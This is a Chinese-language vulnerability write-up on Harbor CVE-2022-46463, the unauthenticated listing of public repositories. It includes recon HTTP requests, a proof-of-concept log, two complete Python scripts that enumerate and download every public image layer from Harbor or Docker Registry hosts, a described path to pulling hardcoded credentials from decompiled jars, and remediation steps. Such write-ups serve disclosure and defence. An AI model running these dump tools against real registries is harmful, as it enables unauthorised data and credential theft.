Harbor 公开镜像仓库未授权访问 CVE-2022-46463
漏洞描述
Harbor 是为企业用户设计的容器镜像仓库开源项目,包括了权限管理 (RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA 等企业必需的功能。Harbor api search 允许未认证的用户搜索仓库内存在的公开仓库,若将私有业务镜像放置于公开仓库,可能存在信息泄漏风险。
此漏洞披露时为未授权漏洞,漏洞影响存在争议。实际上该漏洞是由于安全配置不当,允许任意用户通过 /api/search?q=
接口搜索到所有公开仓库,下载公开仓库中的镜像(而非直接访问私有仓库)。但如果将私有业务镜像放置于公开仓库,可能存在信息泄漏风险,相应利用场景:
- 下载包含敏感环境的公开镜像;
- 分析镜像,发现服务启动时进行了 jar 文件拷贝操作;
- 提取 jar 文件,反编译获取配置文件中硬编码的账号密码。
参考链接:
- https://mp.weixin.qq.com/s/pBkJW1_Vpf_suH50e8K9kg
- https://mp.weixin.qq.com/s/V8Ecqq_DPOQhH5q9UBWkXg
- https://github.com/404tk/CVE-2022-46463
漏洞复现
获取 harbor 信息:
GET /api/systeminfo HTTP/1.1 # harbor 1.x
GET /api/v2.0/systeminfo HTTP/1.1 # harbor 2.x
获取全部 images 和 projects:
GET /api/search?q=/ HTTP/1.1
GET /api/v2.0/search?q=/ HTTP/1.1
获取 images 的 version:
GET /api/repositories/<PROJECT_NAME>/<IMAGE_NAME>/tags?detail=1 HTTP/1.1
GET /api/v2.0/projects/<PROJECT_NAME>/repositories/<IMAGE_NAME>/artifacts?with_tag=true HTTP/1.1
扩展场景:
- 通过 404tk/CVE-2022-46463 枚举公开镜像并 dump;
- 分析镜像,发现服务启动时进行了 jar 文件拷贝操作;
- 提取 jar 文件,反编译获取配置文件中硬编码的账号密码。
漏洞 POC
$ python3 harbor.py https://192.168.11.11
[+] grafana/grafana
[+] library/openjdk
$ python3 harbor.py https://192.168.11.11 --dump library/openjdk:8
[+] Dumping library/openjdk:8
[+] Downloading : 001c52e26ad57e3b25b439ee0052f6692e5c0f2d5d982a00a8819ace5e521452
[+] Downloading : d9d4b9b6e964657da49910b495173d6c4f0d9bc47b3b44273cf82fd32723d165
[+] Downloading : 2068746827ec1b043b571e4788693eab7e9b2a95301176512791f8c317a2816a
[+] Downloading : 9daef329d35093868ef75ac8b7c6eb407fa53abbcb3a264c218c2ec7bca716e6
[+] Downloading : d85151f15b6683b98f21c3827ac545188b1849efb14a1049710ebc4692de3dd5
[+] Downloading : 52a8c426d30b691c4f7e8c4b438901ddeb82ff80d4540d5bbd49986376d85cc9
[+] Downloading : 8754a66e005039a091c5ad0319f055be393c7123717b1f6fee8647c338ff3ceb
$ python3 harbor.py https://192.168.11.11 --dump_all
[+] grafana/grafana
[+] library/openjdk
[+] Dumping grafana/grafana:latest
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
[+] Dumping library/openjdk:8
[+] Downloading : 001c52e26ad57e3b25b439ee0052f6692e5c0f2d5d982a00a8819ace5e521452
[+] Downloading : d9d4b9b6e964657da49910b495173d6c4f0d9bc47b3b44273cf82fd32723d165
[+] Downloading : 2068746827ec1b043b571e4788693eab7e9b2a95301176512791f8c317a2816a
[+] Downloading : 9daef329d35093868ef75ac8b7c6eb407fa53abbcb3a264c218c2ec7bca716e6
[+] Downloading : d85151f15b6683b98f21c3827ac545188b1849efb14a1049710ebc4692de3dd5
[+] Downloading : 52a8c426d30b691c4f7e8c4b438901ddeb82ff80d4540d5bbd49986376d85cc9
[+] Downloading : 8754a66e005039a091c5ad0319f055be393c7123717b1f6fee8647c338ff3ceb
harbor.py
# -*- coding:utf-8 -*-
import os
import tarfile
import argparse
import requests
requests.packages.urllib3.disable_warnings()
CACHE_PATH = "./caches/"
TIMEOUT = 5
def manageArgs():
parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("--v2", dest='v2', default=False, help="API v2.0", action="store_true")
action = parser.add_mutually_exclusive_group()
action.add_argument("--dump", metavar="IMAGENAME", dest='dump', type=str, help="ImageName")
action.add_argument("--tags", dest='tags', default=False, help="list tags", action="store_true")
action.add_argument("--dump_all", dest='dump_all', help="dump all", action="store_true")
args = parser.parse_args()
return args
def createDir(directoryName):
if "../" in directoryName:
print("[-] Hacker!")
return
if not os.path.exists(f"{CACHE_PATH}{directoryName}"):
os.makedirs(f"{CACHE_PATH}{directoryName}")
class HarborUnauth():
def getImages(self):
url = "%s/api/search?q=" % self.target
url_v2 = "%s/api/v2.0/search?q=/" % self.target
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
if req.status_code != 200:
self.v2 = True
print("[*] API version used v2.0")
req=requests.get(url_v2,timeout=TIMEOUT,verify=False)
repos = req.json()["repository"]
images = []
for repo in repos:
print("[+]",repo["repository_name"])
if self.list_tags:
self.getTags(repo["repository_name"])
images.append(repo["repository_name"])
return images
except Exception as e:
print("[-] Not vulnerability.")
return None
def getTags(self,image_name):
results = []
url = "%s/api/repositories/%s/tags?detail=1"%(self.target,image_name)
if self.v2:
info = image_name.split("/")
if len(info) != 2:
print("[-] Image name format error.")
return results
url = "%s/api/v2.0/projects/%s/repositories/%s/artifacts?with_tag=true"%(self.target,info[0],info[1])
try:
req = requests.get(url,timeout=TIMEOUT,verify=False)
tags = req.json()
for tag in tags:
if "name" in tag.keys():
tag_name = tag["name"]
elif tag["tags"] == None:
tag_name = tag["digest"].split(":")[1][:6]
else:
tag_name = tag["tags"][0]["name"]
if self.list_tags:
print(f" [*] {image_name}:{tag_name}")
results.append({"image":image_name,"tag":tag_name,"sha256":tag["digest"]})
if self.list_tags:
print()
except Exception as e:
print("[-] Get tags failed, maybe you should specify the --v2 argument.")
return results
def getToken(self,image_name):
url = f"{self.target}/service/token?scope=repository%3A{image_name}%3Apull&service=harbor-registry"
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
auth=req.json()["token"]
return auth
except Exception as e:
return ""
def getBlob(self,image_name,version,digest,header):
url = "%s/v2/%s/manifests/%s" % (self.target,image_name,digest)
try:
req=requests.get(url,headers=header,timeout=TIMEOUT,verify=False)
layers = req.json()["layers"]
createDir(image_name.replace("/","_")+"/"+version.replace(".","_"))
for l in layers:
self.downloadSha(image_name,version,l["digest"],header)
except Exception as e:
print("[-]",str(e))
def downloadSha(self,image_name,version,sha256,header):
dir = image_name.replace("/","_")+"/"+version.replace(".","_")
name = sha256.split(":")[1]
filenamesha = f"{CACHE_PATH}{dir}/{name}.tar.gz"
url = f"{self.target}/v2/{image_name}/blobs/{sha256}"
try:
req=requests.get(url,headers=header,timeout=TIMEOUT,verify=False)
if req.status_code == 200:
print(f" [+] Downloading : {name}")
with open(filenamesha, 'wb') as out:
for bits in req.iter_content():
out.write(bits)
tf = tarfile.open(filenamesha)
tf.extractall(f"{CACHE_PATH}{dir}/{name}")
os.remove(filenamesha)
else:
print(" [-] Download fail:",req.status_code)
except Exception as e:
print(e)
def check(self,args):
self.target = args.url.strip().strip("/")
self.v2 = args.v2
self.list_tags = args.tags
images = []
if args.dump:
images.append(args.dump)
else:
images = self.getImages()
if images != None and len(images)==0:
print("[-] 0 public images found.")
return
if not args.dump_all:
return
for image in images:
auth = self.getToken(image)
if auth == "":
print("[-] Get token failed.")
return
header = {"Authorization": "Bearer "+auth}
tags = self.getTags(image)
for tag in tags:
print("[+] Dumping : %s:%s"%(tag["image"],tag["tag"]))
self.getBlob(tag["image"],tag["tag"],tag["sha256"],header)
if __name__ == "__main__":
args = manageArgs()
m = HarborUnauth()
m.check(args)
registry.py(Docker Registry API dump)
# -*- coding:utf-8 -*-
import os
import tarfile
import argparse
import requests
requests.packages.urllib3.disable_warnings()
CACHE_PATH = "./caches/"
TIMEOUT = 5
def manageArgs():
parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
action = parser.add_mutually_exclusive_group()
action.add_argument("--dump", metavar="IMAGENAME", dest='dump', type=str, help="ImageName")
action.add_argument("--tags", dest='tags', default=False, help="list tags", action="store_true")
action.add_argument("--dump_all", dest='dump_all', help="dump all", action="store_true")
args = parser.parse_args()
return args
def createDir(directoryName):
if "../" in directoryName:
print("[-] Hacker!")
return
if not os.path.exists(f"{CACHE_PATH}{directoryName}"):
os.makedirs(f"{CACHE_PATH}{directoryName}")
class RegistryUnauth():
def getImages(self):
url = "%s/v2/_catalog" % self.target
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
repos = req.json()["repositories"]
images = []
for repo in repos:
print("[+]",repo)
if self.list_tags:
self.getTags(repo)
images.append(repo)
return images
except Exception as e:
print("[-] Not vulnerability.")
return None
def getTags(self,image_name):
results = []
url = "%s/v2/%s/tags/list"%(self.target,image_name)
try:
req = requests.get(url,timeout=TIMEOUT,verify=False)
tags = req.json()["tags"]
for tag in tags:
if self.list_tags:
print(f" [*] {image_name}:{tag}")
results.append({"image":image_name,"tag":tag})
if self.list_tags:
print()
except Exception as e:
print("[-] Get tags failed,", str(e))
return results
def getBlob(self,image_name,tag):
url = "%s/v2/%s/manifests/%s" % (self.target,image_name,tag)
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
layers = req.json()["fsLayers"]
createDir(image_name.replace("/","_")+"/"+tag.replace(".","_"))
for l in layers:
self.downloadSha(image_name,tag,l["blobSum"])
except Exception as e:
print("[-]",str(e))
def downloadSha(self,image_name,version,sha256):
dir = image_name.replace("/","_")+"/"+version.replace(".","_")
name = sha256.split(":")[1]
filenamesha = f"{CACHE_PATH}{dir}/{name}.tar.gz"
url = f"{self.target}/v2/{image_name}/blobs/{sha256}"
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
if req.status_code == 200:
print(f" [+] Downloading : {name}")
with open(filenamesha, 'wb') as out:
for bits in req.iter_content():
out.write(bits)
tf = tarfile.open(filenamesha)
tf.extractall(f"{CACHE_PATH}{dir}/{name}")
os.remove(filenamesha)
else:
print(" [-] Download fail:",req.status_code)
except Exception as e:
print(e)
def check(self,args):
self.target = args.url.strip().strip("/")
self.list_tags = args.tags
images = []
if args.dump:
images.append(args.dump)
else:
images = self.getImages()
if images != None and len(images)==0:
print("[-] 0 public images found.")
return
if not args.dump_all:
return
for image in images:
tags = self.getTags(image)
for tag in tags:
print("[+] Dumping : %s:%s"%(tag["image"],tag["tag"]))
self.getBlob(tag["image"],tag["tag"])
if __name__ == "__main__":
args = manageArgs()
m = RegistryUnauth()
m.check(args)
漏洞修复
- 限制公开访问,进入“项目设置”→“配置管理”→“项目仓库”中的“公开”,取消勾选。
- 在业务允许的前提下,将系统部署在内网,减少外部暴露面。